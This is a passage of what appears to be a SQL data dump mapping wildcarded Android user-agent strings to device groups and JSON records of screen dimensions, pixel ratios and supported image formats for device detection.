Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; xx A2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; xx Fit FR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; xx Hola FR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; xx Hop) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":664,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; xx Lift) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; xx MIX 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":785,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; xx MIX 2S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; xx Note 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":699,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; xx Note 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":699,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; xx xx) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile DuckDuckGo/5 Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; Android) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; MI 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; MI 6X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; MI 8 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":830,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; MI 8 SE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":816,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; MI 8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":818,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; MI MAX 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; P30 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; P30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; Pixel 2 XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; Redmi Note 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; Redmi Note 6 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":830,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; Redmi Note 7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; Redmi Note 8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; S10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; SAMSUNG SM-A530F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; SAMSUNG SM-G950F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; SAMSUNG SM-G955F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; SM-G955U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; SM-G9750) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; Young Y56) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9.*; xx Note 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":699,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 16s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":744,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5001A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5001D_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5001J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5006D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5006G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5024A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5024D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5024D_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5024D_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5024F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5024F_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5024J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5032W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5039D_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5048A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5048U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5048U_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5048Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5048Y_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5048Y_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5053A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":753,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5053D_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5053K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5053K_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5053Y_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5101A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5124J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 5148A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 605SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 701SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":678,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 701SO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 702SO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 706SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 801SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 801SO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 803SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 8084_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 808SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 901SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 9029Z) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; 902SO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; A0001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; A1 Alpha) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; A3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; A3_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; A5_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; A60Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; A6_mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; A7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; A80Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 